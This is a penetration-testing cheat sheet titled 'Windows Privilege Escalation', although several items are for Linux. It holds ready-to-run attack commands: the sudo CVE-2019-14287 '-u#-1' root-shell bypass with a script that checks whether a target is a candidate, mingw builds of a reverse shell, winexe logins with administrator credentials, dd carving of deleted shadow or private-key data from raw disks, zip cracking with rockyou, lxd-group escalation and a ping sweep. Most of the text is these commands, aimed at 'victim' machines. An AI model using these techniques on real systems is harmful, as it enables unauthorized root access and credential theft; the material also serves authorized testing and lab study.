aRF-Sec Cheat Sheets
Windows Privilege Escalation

Tips & Tricks

Spawn root shell

sudo -s

# Not allowed to run anything as root, but sudoers lets you run a command as
# any *other* user (a rule such as "(ALL, !root) /bin/bash" in "sudo -l")?
# sudo before 1.8.28 (CVE-2019-14287) treats user ID -1 (or 4294967295) as
# root, so asking for that UID slips past the "!root" restriction:

sudo -u#-1 /bin/bash
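
The check a practitioner wants before trying the trick above, as an added example that is not part of the cheat sheet: parse the version string from "sudo --version" and a rule line from "sudo -l", and only report a candidate when the version is older than 1.8.28 and the rule has the "(ALL, !root)" shape. The version and rule strings in the block are constructed samples, not output from a real host; run it on a target by feeding it the real "sudo --version | head -1 | awk '{print $3}'" and "sudo -l" output.

```sh
#!/bin/sh
# Added example, not part of the cheat sheet: decide from "sudo --version"
# and a "sudo -l" rule whether "sudo -u#-1 <cmd>" (CVE-2019-14287) is worth
# trying. Sample strings below are constructed, not real host output.

# sudo_version_vulnerable "1.8.27" -> true (exit 0) when older than 1.8.28.
# Accepts 1.8.27, 1.8.27p1, 1.9.5p2 ...; the non-numeric suffix is dropped.
sudo_version_vulnerable() {
    set -- $(printf '%s\n' "$1" | sed 's/[^0-9.].*$//' | tr '.' ' ')
    maj=${1:-0}; min=${2:-0}; pat=${3:-0}
    [ "$maj" -lt 1 ] && return 0
    [ "$maj" -gt 1 ] && return 1
    [ "$min" -lt 8 ] && return 0
    [ "$min" -gt 8 ] && return 1
    [ "$pat" -lt 28 ]
}

# rule_allows_any_but_root "(ALL, !root) NOPASSWD: /bin/bash" -> true.
# Matches the "run as anyone except root" sudoers shape, written as !root or !#0.
rule_allows_any_but_root() {
    printf '%s\n' "$1" |
        grep -Eq '\([[:space:]]*ALL[[:space:]]*,[[:space:]]*!(root|#0)[[:space:]]*\)'
}

# Both conditions must hold for "sudo -u#-1 /bin/bash" to land a root shell.
sudo_uid_bypass_candidate() {
    sudo_version_vulnerable "$1" && rule_allows_any_but_root "$2"
}

# Constructed sample input (not from a real host):
sample_version="1.8.27p1"
sample_rule="(ALL, !root) NOPASSWD: /bin/bash"
if sudo_uid_bypass_candidate "$sample_version" "$sample_rule"; then
    echo "sudo $sample_version with rule '$sample_rule': try sudo -u#-1 /bin/bash"
else
    echo "not a candidate for the -u#-1 trick"
fi
```

The version test on its own is not enough: a patched-version check without the "!root" rule produces false positives, because on a host where sudoers simply does not grant you anything, "sudo -u#-1" prompts and fails like any other sudo invocation.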

No "whoami" on Windows?

try:
echo %username%
set

# "set" on its own dumps every environment variable, so look for USERNAME,
# USERDOMAIN and COMPUTERNAME in its output.
# If neither works, transfer Kali's whoami.exe to the victim machine
# (/usr/share/windows-resources/binaries/whoami.exe; older Kali releases
# keep it under /usr/share/windows-binaries/).

Banner Grab a website

curl -s -I http://IP_ADDRESS

# -I sends a HEAD request and prints only the response headers (Server,
# X-Powered-By, Set-Cookie ...). Add -k for HTTPS with a self-signed
# certificate, or -L to follow redirects to the real application.

Mingw C compiler for windows

x86_64-w64-mingw32-gcc shell.c -o shell.exe    # 64-bit target

i686-w64-mingw32-gcc shell.c -o shell.exe      # 32-bit target

# A Winsock reverse shell also needs -lws2_32 at the end of the command
# line, and the architecture must match the target process you will run it from.

winexe

On Kali, winexe can spawn a shell on Windows 2003, XP and earlier (hosts that still speak SMB1 and accept local administrator credentials). Unlikely in the wild, but they may be in pentesting labs.

winexe -U 'admin%password' //10.10.10.14 cmd.exe

# -U takes the credentials as user%password; the target is written in //host form.

Grep for deleted files

grep --binary-files=text --context=100 'root' /dev/sdb > /tmp/root.txt

# Assuming the deleted file lived on /dev/sdb and contained the string "root"
# (grep searches file contents, not file names), its blocks are usually still
# on disk until they are reused, so we can partially recover it into
# /tmp/root.txt. Reading the raw device needs root (or a group with read
# access to the block device). --binary-files=text (-a) stops grep from
# bailing out with "Binary file matches"; --context=100 (-C 100) keeps 100
# lines of raw disk data on either side of each hit. Write the output to a
# different disk than the one you are carving, or you may overwrite the very
# blocks you are trying to recover.
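
The same idea carried one step further, as an added example that is not part of the cheat sheet: instead of 100 lines of context per hit, locate the byte offset of every occurrence of the string and carve a fixed window of bytes around it with dd, one file per hit, so each fragment can be inspected or fed to strings separately. The image the block builds is a constructed stand-in for /dev/sdb (filler blocks around one "deleted" shadow-style line with a placeholder hash); point carve_around at the real device as root and write the output to another disk.

```sh
#!/bin/sh
# Added example, not part of the cheat sheet: carve the bytes around every
# occurrence of a fixed string in a raw image or block device. The sample
# image is constructed for the demo; nothing here is real disk data.

# carve_around IMAGE STRING WINDOW OUTDIR
#   writes OUTDIR/hit_<offset>.bin for each match, holding WINDOW bytes
#   before and after it; returns 1 if STRING is not found at all.
carve_around() {
    img=$1; pat=$2; win=$3; out=$4
    mkdir -p "$out"
    hits=0
    # -a treat binary as text, -b byte offset, -o only the match (so -b
    # reports the offset of the match itself), -F fixed string, not a regex
    for off in $(grep -aboF -- "$pat" "$img" | cut -d: -f1); do
        start=$((off - win))
        [ "$start" -lt 0 ] && start=0
        dd if="$img" of="$out/hit_$off.bin" bs=1 skip="$start" \
           count=$((win * 2 + ${#pat})) 2>/dev/null
        hits=$((hits + 1))
    done
    [ "$hits" -gt 0 ]
}

# Constructed stand-in for a disk: filler, one "deleted" shadow-style line,
# more filler. The hash field is a placeholder, not a real hash.
make_sample_image() {
    {
        head -c 3000 /dev/zero | tr '\0' 'A'
        printf 'root:$6$placeholder$:19000:0:99999:7:::\n'
        head -c 3000 /dev/zero | tr '\0' 'B'
    } > "$1"
}

# Usage (real disk: carve_around /dev/sdb 'root:' 4096 /mnt/usb/carved):
# make_sample_image /tmp/demo.img
# carve_around /tmp/demo.img 'root:' 64 /tmp/carved && ls -l /tmp/carved
```

A window of a few KiB is usually the right size for a text file such as /etc/shadow or a private key; grep's line-based context is a poor fit for raw disk because a "line" of filesystem data can be megabytes long or a handful of bytes.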

Cracking zip files

fcrackzip -v -D -u -p /usr/share/dict/words secret.zip

fcrackzip -v -D -u -p ./rockyou.txt 16162020_backup.zip

# -D dictionary mode, -p wordlist to read from, -u verify each candidate with
# unzip (weeds out false positives), -v verbose. fcrackzip only handles the
# legacy ZipCrypto scheme; for AES-encrypted archives use zip2john and john.

LXD Alpine image builder

git clone https://github.com/saghul/lxd-alpine-builder.git

# Builds the minimal Alpine image used for the lxd-group privilege escalation
# (a member of the lxd group can launch a privileged container with the host
# filesystem mounted inside it).

Ping sweep Windows

FOR /L %i IN (1,1,254) DO ping -n 1 -w 200 172.16.2.%i

# pipe to file:
FOR /L %i IN (1,1,254) DO ping -n 1 -w 200 172.16.2.%i | FIND /i "TTL=" >> C:\Users\ip.txt

# -w 200 caps each probe at 200 ms so dead hosts don't stall the sweep.
# Match on "TTL=" rather than "Reply": an unreachable address makes ping print
# "Reply from <your own IP>: Destination host unreachable", which "Reply"
# would count as a live host. Inside a .bat file double the loop variable (%%i).

Last updated 4 years ago
